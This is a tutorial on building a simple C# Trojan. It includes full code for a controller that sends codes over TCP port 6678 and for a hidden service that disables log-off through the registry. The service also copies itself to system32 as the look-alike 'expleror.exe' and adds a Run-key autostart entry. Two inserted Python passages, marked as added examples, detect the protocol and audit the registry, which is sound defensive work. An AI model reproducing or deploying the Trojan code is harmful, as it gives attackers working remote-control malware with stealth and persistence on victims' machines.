Trojan introduction: Because this article explores Trojans, some basic knowledge of how a Trojan is put together must be introduced first. A complete Trojan system consists of a hardware part, a software part, and a specific connection part. This article mainly covers the software part, which consists of a controller program, the Trojan itself (a background service), and the Trojan configuration. The control end is the program used to remotely control the server; the Trojan is the program that sneaks onto the server. The Trojan configuration sets the port number, trigger condition, Trojan name and other settings that make the program harder to notice.
Technology used:
The control terminal program sends control codes to the server; the server runs in the background and its purpose is to modify the registry. The technology is not very difficult; it mainly consists of C# network programming and registry modification.
Control terminal development:
The control terminal issues a control code to the server. After receiving the control code, the server completes the designated task according to the control requirement; if the server completes the job, it returns a success message.
Implementation of the control end:
The control codes can be defined as you like and need no detailed explanation; there are several difficult points.
1. Connection request
Use the System.Net.Sockets.TcpClient class from the .NET class library. In TcpClient(string hostname, int port), hostname is the name of the host to be controlled (an IP address can also be used) and port is the port number.

    // Fields used by the handlers in this form:
    // private TcpClient client;
    // private NetworkStream stream;      // provides the data stream for network access
    // private Thread threadReceive;
    // private string control = "000000"; // the control code currently selected
    // System.EventArgs is the base class for event data
    private void button7_Click(object sender, System.EventArgs e)
    {
        // Record the operation in the RichTextBox control
        richTextBox1.AppendText("Request connection " + textBox1.Text + "\r");
        int port = 6678;
        try
        {
            // Initialize a new instance of the TcpClient class and connect to the specified port on the specified host
            client = new TcpClient(textBox1.Text, port);
        }
        catch
        {
            MessageBox.Show("The server is not online! Check whether the host name was entered.");
            richTextBox1.AppendText("The server is not online! Check whether the host name was entered.");
        }
    }
2. Testing whether the controlled machine is connected. The program sends a control code and checks whether the controlled end reacts; if something is returned, the connection is successful.

    // Provides the data stream for network access
    // private NetworkStream stream;
    private void button8_Click(object sender, System.EventArgs e)
    {
        // Record the operation
        richTextBox1.AppendText("Test connection" + "\r");
        try
        {
            stream = client.GetStream();
            if (stream.CanWrite)
            {
                // Send the control code
                string control = "jiance";
                byte[] by = System.Text.Encoding.ASCII.GetBytes(control);
                stream.Write(by, 0, by.Length);
                // Flush so the data is sent immediately
                stream.Flush();
                // Start the thread that receives the returned data;
                // receive is the function the thread executes, see the analysis below
                threadReceive = new Thread(new ThreadStart(receive));
                threadReceive.Start();
            }
        }
        catch (Exception ee)
        {
            richTextBox1.AppendText(ee.Message + "\r");
            MessageBox.Show(ee.Message);
        }
    }

3. Sending the control code

    private void button9_Click(object sender, System.EventArgs e)
    {
        // Here the control code to be transmitted is determined; the radioButtons are form controls.
        // warring, suggest and drop are string fields holding control codes (defined elsewhere in the program).
        if (radioButton1.Checked) { control = form2.zhucex; }
        else if (radioButton2.Checked) { control = form3.zhuces; }
        else if (radioButton3.Checked) { control = warring; }
        else if (radioButton4.Checked) { control = suggest; }
        else if (radioButton5.Checked) { control = form4.mumawe; }
        else if (radioButton6.Checked) { control = drop; }
        if (control == "000000")
        {
            MessageBox.Show("You did not enter any control target! No control signal");
            richTextBox1.AppendText("You did not enter any control target! No control signal");
        }
        else if (control != "000000")
        {
            try
            {
                // Record the operation
                richTextBox1.AppendText(control + " is trying to control, wait for a response..." + "\r");
                stream = client.GetStream();
                if (stream.CanWrite)
                {
                    byte[] by = System.Text.Encoding.ASCII.GetBytes(control);
                    stream.Write(by, 0, by.Length);
                    stream.Flush();
                    threadReceive = new Thread(new ThreadStart(receive));
                    threadReceive.Start();
                } // end if
            } // try
            catch
            {
                richTextBox1.AppendText("The server is not connected, control is invalid!" + "\r");
                MessageBox.Show("Server not connected, control is invalid!" + "\r");
            }
        } // else if
    }

4. The function the thread executes

    private void receive()
    {
        // Set aside the space for reading data
        byte[] bb = new byte[3];
        // Read 3 bytes; i is the number of bytes actually read
        int i = stream.Read(bb, 0, 3);
        // Convert to a string; if the control code is Chinese, use
        // string ss = System.Text.Encoding.Unicode.GetString(bb);
        string ss = System.Text.Encoding.ASCII.GetString(bb);
        // The return codes I set for the server: hjc means the connection succeeded, HKZ means the control succeeded
        if (ss == "hjc")
        {
            MessageBox.Show("Connection successful");
            richTextBox1.AppendText("Connection successful");
        }
        if (ss == "HKZ")
        {
            richTextBox1.AppendText(control + " control successful" + "\r");
            MessageBox.Show(control + " control successful" + "\r");
        }
    }
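The exchange above is a fixed-format protocol: the controller sends a 6-byte ASCII code to port 6678 and expects a 3-byte reply ("hjc" for the connectivity test, "HKZ" for a completed control). That rigidity is what a defender can match on. The following is an added example, not code from the original article: it labels reassembled TCP segments by that signature and pairs each request with its reply into a confirmed control session. The port, the request codes (including the "ZX1000"/"zx0100" codes from the service's switch statement later in the article) and the replies are taken from the article; the Segment record, the names and the sample traffic are assumptions constructed here.

```python
"""Pair the fixed-size control messages of the article's protocol into confirmed sessions.

Added example, not code from the original article. Assumes TCP payloads have already
been reassembled into per-segment records (e.g. from a packet capture). Port 6678, the
6-byte request codes and the 3-byte replies are quoted from the article; the sample
traffic is constructed.
"""
from dataclasses import dataclass

CONTROL_PORT = 6678
# Request codes the service's switch statement understands (6 ASCII bytes each)
REQUEST_CODES = {b"jiance": "connectivity test", b"ZX1000": "disable logoff", b"zx0100": "UNCLOSE"}
# Replies the controller's receive() thread expects (3 ASCII bytes each)
REPLY_CODES = {b"hjc": "test acknowledged", b"HKZ": "control acknowledged"}


@dataclass(frozen=True)
class Segment:  # constructed record type, one application-layer payload per segment
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes


def classify(seg):
    """Return ('request', meaning) or ('reply', meaning) for a matching segment, else None.
    The service reads exactly 6 bytes and the controller exactly 3, so the payload
    length is part of the signature, not just the byte values."""
    if seg.dport == CONTROL_PORT and len(seg.payload) == 6 and seg.payload in REQUEST_CODES:
        return ("request", REQUEST_CODES[seg.payload])
    if seg.sport == CONTROL_PORT and len(seg.payload) == 3 and seg.payload in REPLY_CODES:
        return ("reply", REPLY_CODES[seg.payload])
    return None


def detect(segments):
    """Walk segments in capture order. A request followed by a reply on the reversed
    4-tuple is reported as (controller, implant, action); lone matches are ignored,
    which keeps a single coincidental 6-byte payload from raising an alert."""
    pending = {}  # (client, client port, server) -> meaning of the outstanding request
    confirmed = []
    for seg in segments:
        label = classify(seg)
        if label is None:
            continue
        kind, meaning = label
        if kind == "request":
            pending[(seg.src, seg.sport, seg.dst)] = meaning
        else:
            key = (seg.dst, seg.dport, seg.src)
            if key in pending:
                confirmed.append((seg.dst, seg.src, pending.pop(key)))
    return confirmed


# Constructed sample: controller 10.0.0.5, implant 10.0.0.20, plus unrelated traffic
SAMPLE = [
    Segment("10.0.0.5", 51000, "10.0.0.20", CONTROL_PORT, b"jiance"),
    Segment("10.0.0.20", CONTROL_PORT, "10.0.0.5", 51000, b"hjc"),
    Segment("10.0.0.7", 52000, "10.0.0.20", 80, b"GET / HTTP/1.1\r\n"),
    Segment("10.0.0.5", 51000, "10.0.0.20", CONTROL_PORT, b"ZX1000"),
    Segment("10.0.0.20", CONTROL_PORT, "10.0.0.5", 51000, b"HKZ"),
    Segment("10.0.0.9", 53000, "10.0.0.20", CONTROL_PORT, b"hello!"),  # right length, unknown code
]

if __name__ == "__main__":
    for controller, implant, action in detect(SAMPLE):
        print(f"{controller} -> {implant}: {action}")
```

Because the codes are plain ASCII and unauthenticated, the same pairing logic can be fed from any tool that hands over per-flow payloads; what matters for accuracy is requiring the reply on the reversed 4-tuple rather than alerting on the request alone.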
Service development:
To implement the Trojan service program, the following functions are mainly needed: running in the background (hiding technique), receiving the control code, and modifying the registry. These three aspects are introduced below:
1. In VC#, building a background service program is easy. First create a new C# Windows application; the project name is your own choice (but to hide it, use a name that resembles a system name). Set the form's ShowInTaskbar property to false so that it does not appear in the taskbar when running, and set the WindowState property to Minimized so that the form is hidden. Of course, you can also set these in InitializeComponent(); this function performs initialization and runs before the form is displayed. The code is as follows:

    private void InitializeComponent()
    {
        //
        // Form1
        //
        // Form starting position and size
        this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
        this.ClientSize = new System.Drawing.Size(368, 357);
        // Form name
        this.Name = "Form1";
        // Set the properties so the form runs in the background
        this.ShowInTaskbar = false;
        this.Text = "Form1";
        this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
    }
2. Receiving the control code. The listening code is added in the form constructor:

    public Form1() // Form constructor
    {
        //
        // Required for Windows Form Designer support
        //
        InitializeComponent();
        //
        // TODO: Add any constructor code after the InitializeComponent call
        //
        // Add your listening code here.
        // The port can be set as you like; I use a fixed port
        int port = 6678;
        // System.Net.Sockets.TcpListener is used to listen for clients on the TCP network
        listener = new TcpListener(port);
        // Start listening
        listener.Start();
        // Add the thread that receives the control code; to stop the thread you can use Thread.Abort().
        // recontrolcode is the function the thread starts executing; it selects the appropriate
        // registry modification function based on the received control code
        Thread thread = new Thread(new ThreadStart(recontrolcode));
        thread.Start();
    }

The recontrolcode function is as follows; for the full code see the program:

    private void recontrolcode()
    {
        // Set up the receiving socket; listener.AcceptSocket() accepts a pending client request
        Socket socket = listener.AcceptSocket();
        // Execute while the connection is established
        while (socket.Connected)
        {
            // Receive the control code
            byte[] by = new byte[6];
            int i = socket.Receive(by, by.Length, 0);
            string ss = System.Text.Encoding.ASCII.GetString(by);
            // Select a different registry modification function based on the control code
            switch (ss)
            {
                case "jiance":
                    // Test connection: return the test information string
                    string str = "hjc";
                    byte[] bytee = System.Text.Encoding.ASCII.GetBytes(str);
                    socket.Send(bytee, 0, bytee.Length, 0);
                    break;
                case "ZX1000":
                    // Registry modification function, self-defined, see the analysis below
                    unlogoff();
                    // Return the control message
                    RetMessage();
                    break;
                case "zx0100":
                    // Registry modification function
                    UNCLOSE();
                    // Return the control message
                    RetMessage();
                    break;
                // Further case branches repeat the pattern and are omitted
                default:
                    break;
            } // switch
        } // while
    } // recontrolcode

3. In the C# implementation of registry modification, use the Microsoft.Win32 namespace of the .NET class library, which provides two kinds of classes: classes that handle events raised by the operating system, and classes that operate on the system registry. Its usage is shown below. Here I have written a subroutine that modifies the registry so that the computer cannot log off. First, some registry background: under the subkey Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, setting the value NoLogoff to 1 makes the computer unable to log off. The following function uses C# to implement the registry modification:
    private void unlogoff()
    {
        // Get the top-level node of the host's registry
        Microsoft.Win32.RegistryKey rlocal = Registry.LocalMachine;
        // Declare a registry key (null until a subkey is opened)
        RegistryKey key1 = null;
        try
        {
            // RegistryKey.OpenSubKey(string name, bool writable) retrieves the specified subkey;
            // name is the subkey specified by the user, writable says whether it may be modified (default false)
            key1 = rlocal.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", true);
            // Set the value name and data under the subkey
            key1.SetValue("NoLogoff", 1);
            // Close the opened subkey
            key1.Close();
            // Warning string (mystr is a string field collecting warning messages)
            mystr = mystr + "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer value NoLogoff has been modified! Please set it to 0!";
        }
        catch { }
        // If the subkey does not exist, create it
        if (key1 == null)
        {
            try
            {
                // Use RegistryKey.CreateSubKey(string subkey) to create the subkey
                RegistryKey key2 = rlocal.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                key2.SetValue("NoLogoff", 1);
                key2.Close();
                mystr = mystr + "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer value NoLogoff has been modified! Please set it to 0!";
            }
            catch { }
        }
    }

4. An important function in a Trojan program is self-copying and moving. The Trojan must automatically hide itself in SYSTEM or SYSTEM32 to avoid discovery. The moving code is analyzed below; its main function is to move the Trojan from C:\winnt\system\Msdoss.exe to D:\winnt\system32\expleror.exe, changing its name. It uses the .NET namespace System.IO, whose role is to allow synchronous and asynchronous reading and writing of data streams and files; here we use the System.IO.File class.

    private void Movecc1()
    {
        try
        {
            // File.Move(string sourceFileName, string destFileName) moves a file;
            // sourceFileName is the file to move, destFileName is the new path for the file
            File.Move("C:\\winnt\\system\\Msdoss.exe", "D:\\winnt\\system32\\expleror.exe");
        }
        catch { }
        // Set the newly moved Trojan to start automatically; the analysis is the same as before
        RegistryKey rlocal = Registry.LocalMachine;
        RegistryKey key1 = null;
        try
        {
            key1 = rlocal.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            key1.SetValue("MicrosoftT", "D:\\winnt\\system32\\expleror.exe");
            key1.Close();
        }
        catch { }
        if (key1 == null)
        {
            try
            {
                RegistryKey key2 = rlocal.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
                key2.SetValue("MicrosoftT", "D:\\winnt\\system32\\expleror.exe");
                key2.Close();
            }
            catch { }
        }
    } // Movecc1()

This completes the writing of a simple C# Trojan.
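Both registry changes in this section leave durable, easily audited traces: a NoLogoff value of 1 under the Explorer policy key, and a Run value pointing at an executable whose name imitates a system binary and which lives in a Windows-style directory on a drive other than the system drive. The following is an added example, not code from the original article: it parses a .reg export (the text format reg.exe produces) offline and reports exactly those conditions. The key paths and value names are the ones the article's unlogoff() and Movecc1() functions write; SYSTEM_DRIVE, the KNOWN_BINARIES list, the edit-distance threshold and SAMPLE_EXPORT are assumptions constructed here.

```python
"""Offline audit of an exported registry fragment for the modifications described above.

Added example, not code from the original article. Assumes the relevant keys were
exported to .reg text so the check can run anywhere; key paths and value names come
from the article, SYSTEM_DRIVE and KNOWN_BINARIES are assumptions, SAMPLE_EXPORT is
constructed.
"""
import re

POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
SYSTEM_DRIVE = "C:"  # assumption: Windows is installed on C:
# Assumed list of system binaries that autostart entries are compared against
KNOWN_BINARIES = ["explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"]

# Constructed export: one benign autostart entry beside the article's policy and Run values
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLogoff"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VendorUpdater"="C:\\Program Files\\Vendor\\updater.exe"
"MicrosoftT"="D:\\winnt\\system32\\expleror.exe"
"""


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: value}}: dword values become int,
    quoted strings are unescaped, anything else is kept as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m is None or current is None:
            continue
        name, val = m.group(1), m.group(2)
        if val.startswith("dword:"):
            keys[current][name] = int(val[len("dword:"):], 16)
        elif len(val) >= 2 and val.startswith('"') and val.endswith('"'):
            # .reg escapes backslashes and quotes with a backslash
            keys[current][name] = re.sub(r"\\(.)", r"\1", val[1:-1])
        else:
            keys[current][name] = val
    return keys


def edit_distance(a, b):
    """Levenshtein distance, used to spot file names that imitate a system binary."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(filename):
    """Return the known binary this file name imitates (distance 1 or 2, not identical), else None."""
    name = filename.lower()
    for known in KNOWN_BINARIES:
        if name != known and edit_distance(name, known) <= 2:
            return known
    return None


def audit(keys):
    """Return (area, value name, reason) findings for the policy and autostart changes."""
    findings = []
    if keys.get(POLICY_KEY, {}).get("NoLogoff") == 1:
        findings.append(("policy", "NoLogoff", "log-off disabled through the Explorer policy key"))
    for name, path in keys.get(RUN_KEY, {}).items():
        if not isinstance(path, str):
            continue
        exe = path.split("\\")[-1]
        hit = lookalike(exe)
        if hit:
            findings.append(("run", name, f"{exe} imitates {hit}"))
        if path[:2].upper() != SYSTEM_DRIVE and re.search(r"\\win(nt|dows)\\", path, re.I):
            findings.append(("run", name, f"Windows-style directory on a non-system drive: {path}"))
    return findings


if __name__ == "__main__":
    for area, name, reason in audit(parse_reg(SAMPLE_EXPORT)):
        print(f"[{area}] {name}: {reason}")
```

The two Run-key checks are independent on purpose: the look-alike test catches the renamed file even if it is dropped on the system drive, and the directory test catches an honestly named file placed where no installer would put it. Either one alone would miss a variant that the article's code could produce with a one-line change.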